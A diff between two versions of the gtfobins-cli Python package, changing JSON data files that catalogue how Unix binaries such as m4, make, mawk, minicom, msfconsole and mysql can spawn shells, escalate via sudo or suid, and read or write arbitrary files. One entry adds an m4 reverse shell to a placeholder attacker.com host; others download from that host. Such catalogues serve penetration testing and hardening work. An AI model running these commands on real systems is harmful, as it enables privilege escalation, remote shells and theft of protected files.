gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/lwp-download.json

@@ -1,25 +1,27 @@
 {
-  "description": "Fetch a remote file via HTTP GET request.",
   "functions": {
     "file-download": [
       {
-        "code": "lwp-download [url] [file]\n"
+        
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nlwp-download $URL $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo lwp-download [url] [file]\n"
+        
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo lwp-download $URL $LFILE\n"
       }
     ],
     "file-read": [
       {
         "description": "The file path must be absolute.",
-        "code": "TF=$(mktemp)\nlwp-download \"file://[file]\" $TF\ncat $TF\n"
+        "code": "LFILE=file_to_read\nTF=$(mktemp)\nlwp-download \"file://$LFILE\" $TF\ncat $TF\n"
       }
     ],
     "file-write": [
       {
-        "code": "TF=$(mktemp)\necho [data] >$TF\nlwp-download file://$TF [file]\n"
+        
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho DATA >$TF\nlwp-download file://$TF $LFILE\n"
       }
     ]
   }

gtfo/data/lwp-request.json

@@ -2,12 +2,14 @@
   "functions": {
     "file-read": [
       {
-        "code": "lwp-request \"file://[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nlwp-request \"file://$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo lwp-request \"file://[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo lwp-request \"file://$LFILE\"\n"
       }
     ]
   }

gtfo/data/m4.json

@@ -0,0 +1,59 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "",
+        "code": "LFILE=file_to_read\nm4 \"$LFILE\"\n"
+      },
+      {
+        "binary": false,
+        "code": "m4 /path/to/input-file\n",
+        "contexts": {
+          "sudo": null,
+          "suid": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "suid": [
+      {
+        "description": "",
+        "code": "LFILE=file_to_read\n./m4 \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "LFILE=file_to_read\nsudo m4 \"$LFILE\"\n"
+      }
+    ],
+    "command": [
+      {
+        "code": "echo 'esyscmd(/path/to/command)' | m4\n",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "reverse-shell": [
+      {
+        "code": "echo 'esyscmd(/bin/sh -i >& /dev/tcp/attacker.com/12345 0>&1)' | m4\n",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        },
+        "listener": "tcp-server"
+      }
+    ],
+    "shell": [
+      {
+        "code": "echo 'esyscmd(/bin/sh </dev/tty >/dev/tty 2>&1)' | m4\n",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/mail.json

@@ -3,7 +3,7 @@
     "shell": [
       {
         "description": "GNU version only.",
-        "code": "mail --exec='!/bin/sh'"
+        "code": "mail --exec='!/bin/sh'\n"
       },
       {
         "description": "This creates a valid Mbox file which may be required by the binary.",
@@ -13,8 +13,8 @@
     "sudo": [
       {
         "description": "GNU version only.",
-        "code": "sudo mail --exec='!/bin/sh'"
+        "code": "sudo mail --exec='!/bin/sh'\n"
       }
     ]
   }
-}
+}

gtfo/data/make.json

@@ -1,26 +1,34 @@
 {
-  "description": "All these examples only work with GNU 'make' due to the lack of support of the '--eval' flag. The same can be achieved by using a proper 'Makefile' or by passing the content via stdin using '-f -'.",
   "functions": {
     "shell": [
       {
-        "code": "make -s --eval=$'x:\\n\\t-'\"/bin/sh\"\n"
+        "description": "",
+        "code": "COMMAND='/bin/sh'\nmake -s --eval=$'x:\\n\\t-'\"$COMMAND\"\n"
       }
     ],
     "file-write": [
       {
-        "description": "Requires a newer GNU 'make' version.",
-        "code": "make -s --eval=\"\\$(file >[file],DATA)\" .\n"
+        "description": "Requires a newer GNU `make` version.",
+        "code": "LFILE=file_to_write\nmake -s --eval=\"\\$(file >$LFILE,DATA)\" .\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "Requires a newer GNU `make` version.",
+        "code": "CMND='cat file_to_read'\nmake -s --eval=$'x:\\n\\t-'\"$CMND\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./make -s --eval=$'x:\\n\\t-'\"/bin/sh -p\"\n"
+        "description": "",
+        "code": "COMMAND='/bin/sh -p'\n./make -s --eval=$'x:\\n\\t-'\"$COMMAND\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo make -s --eval=$'x:\\n\\t-'\"/bin/sh\"\n"
+        "description": "",
+        "code": "COMMAND='/bin/sh'\nsudo make -s --eval=$'x:\\n\\t-'\"$COMMAND\"\n"
       }
     ]
   }
-}
+}

gtfo/data/man.json

@@ -1,22 +1,24 @@
 {
-  "description": "This invokes the default pager, which is likely to be  'less', other functions may apply.",
   "functions": {
     "shell": [
       {
+        
         "code": "man man\n!/bin/sh\n"
       },
       {
-        "description": "This only works for GNU 'man' and requires GNU 'troff' to be installed.",
+        "description": "This only works for GNU `man` and requires GNU `troff` (`groff` to be installed).",
         "code": "man '-H/bin/sh #' man\n"
       }
     ],
     "file-read": [
       {
-        "code": "man [file]"
+        
+        "code": "man file_to_read\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo man man\n!/bin/sh\n"
       }
     ]

gtfo/data/mawk.json

@@ -2,32 +2,38 @@
   "functions": {
     "shell": [
       {
-        "code": "mawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "mawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ],
     "file-write": [
       {
-        "code": "mawk 'BEGIN { print \"DATA\" > \"[file]\" }'\n"
+        
+        "code": "LFILE=file_to_write\nmawk -v LFILE=$LFILE 'BEGIN { print \"DATA\" > LFILE }'\n"
       }
     ],
     "file-read": [
       {
-        "code": "mawk '//' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nmawk '//' \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./mawk '//' \"[file]\""
+        
+        "code": "LFILE=file_to_read\n./mawk '//' \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo mawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "sudo mawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./mawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "./mawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ]
   }

gtfo/data/minicom.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "Start the following command to open the TUI interface, then:\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\nAfter the shell, exit with `Ctrl-A x`.\n",
+        "code": "minicom -D /dev/null\n"
+      },
+      {
+        "description": "After the shell, exit with `Ctrl-A x`.\n",
+        "code": "TF=$(mktemp)\necho \"! exec /bin/sh <$(tty) 1>$(tty) 2>$(tty)\" >$TF\nminicom -D /dev/null -S $TF\nreset^J\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Start the following command to open the TUI interface, then:\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\nAfter the shell, exit with `Ctrl-A x`.\n",
+        "code": "sudo minicom -D /dev/null\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Start the following command to open the TUI interface, then:\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh -p`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\nAfter the shell, exit with `Ctrl-A x`.\n",
+        "code": "./minicom -D /dev/null\n"
+      }
+    ]
+  }
+}

gtfo/data/more.json

@@ -2,23 +2,27 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TERM= more /etc/profile\n!/bin/sh\n"
       }
     ],
     "file-read": [
       {
-        "code": "more [file]"
+        
+        "code": "more file_to_read\n"
       }
     ],
     "suid": [
       {
-        "code": "./more [file]"
+        
+        "code": "./more file_to_read\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TERM= sudo more /etc/profile\n!/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/mosh-server.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "mosh --server=\"sudo /usr/bin/mosh-server\" localhost\n"
+      }
+    ]
+  }
+}

gtfo/data/mosquitto.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nmosquitto -c \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./mosquitto -c \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo mosquitto -c \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/mount.json

@@ -2,9 +2,9 @@
   "functions": {
     "sudo": [
       {
-        "description": "Exploit the fact that 'mount' can be executed via 'sudo' to replace the 'mount' binary with a shell.",
+        "description": "Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.",
         "code": "sudo mount -o bind /bin/sh /bin/mount\nsudo mount\n"
       }
     ]
   }
-}
+}

gtfo/data/msfconsole.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "sudo msfconsole\nmsf6 > irb\n>> system(\"/bin/sh\")\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo msfconsole\nmsf6 > irb\n>> system(\"/bin/sh\")\n"
+      }
+    ]
+  }
+}

gtfo/data/msgattrib.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nmsgattrib -P $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo msgattrib -P $LFILE\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./msgattrib -P $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/msgcat.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nmsgcat -P $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo msgcat -P $LFILE\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./msgcat -P $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/msgconv.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nmsgconv -P $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo msgconv -P $LFILE\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./msgconv -P $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/msgfilter.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "Any text file will do as the input (use `-i`). `kill` is needed to spawn the shell only once.",
+        "code": "echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The file is parsed and displayed as a Java `.properties` file, so this may not be suitable to read arbitrary binary data. `/bin/cat` can be replaced with any other *filter* program.",
+        "code": "LFILE=file_to_read\nmsgfilter -P -i \"LFILE\" /bin/cat\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Any text file will do as the input (use `-i`). `kill` is needed to spawn the shell only once.",
+        "code": "echo x | sudo msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Any text file will do as the input (use `-i`). `kill` is needed to spawn the shell only once.",
+        "code": "echo x | ./msgfilter -P /bin/sh -p -c '/bin/sh -p 0<&2 1>&2; kill $PPID'\n"
+      }
+    ]
+  }
+}

gtfo/data/msgmerge.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nmsgmerge -P $LFILE /dev/null\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo msgmerge -P $LFILE /dev/null\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./msgmerge -P $LFILE /dev/null\n"
+      }
+    ]
+  }
+}

gtfo/data/msguniq.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nmsguniq -P $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo msguniq -P $LFILE\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./msguniq -P $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/mtr.json

@@ -1,15 +1,16 @@
 {
-  "description": "The read file content is corrupted by error prints.",
   "functions": {
     "file-read": [
       {
-        "code": "mtr --raw -F \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nmtr --raw -F \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo mtr --raw -F \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo mtr --raw -F \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/multitime.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "multitime /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./multitime /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo multitime /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/mutt.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "LFILE=file_to_read\nsudo mutt -F $LFILE\n"
+      },
+      {
+        "description": "",
+        "code": "LFILE=file_to_read\nsudo mutt -i $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/mv.json

@@ -1,15 +1,16 @@
 {
-  "description": "This can be used to move and then read or write files from a restricted file systems or with elevated privileges.",
   "functions": {
     "suid": [
       {
-        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\n./mv $TF [file]\n"
+        
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\n./mv $TF $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nsudo mv $TF [file]\n"
+        
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo mv $TF $LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/mypy.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "mypy /path/to/input-file",
+        "comment": "Partial content is leaked as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "binary": false,
+        "code": "mypy /path/to/input-file --junit-xml /path/to/output-file",
+        "comment": "Partial content is leaked as error messages inside some XML tags.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/mysql.json

@@ -1,26 +1,28 @@
 {
-  "description": "A valid MySQL server must be available.",
   "functions": {
     "shell": [
       {
-        "code": "mysql -e '\\! /bin/sh'"
+        
+        "code": "mysql -e '\\! /bin/sh'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo mysql -e '\\! /bin/sh'"
+        
+        "code": "sudo mysql -e '\\! /bin/sh'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./mysql -e '\\! /bin/sh'"
+        
+        "code": "./mysql -e '\\! /bin/sh'\n"
       }
     ],
     "library-load": [
       {
-        "description": "A MySQL server must accept connections in order for this to work. The following loads the '/path/to/lib.so' shared object.",
-        "code": "mysql --default-auth ../../../../../path/to/lib"
+        "description": "A MySQL server must accept connections in order for this to work.\n\nThe following loads the `/path/to/lib.so` shared object.\n",
+        "code": "mysql --default-auth ../../../../../path/to/lib\n"
       }
     ]
   }
-}
+}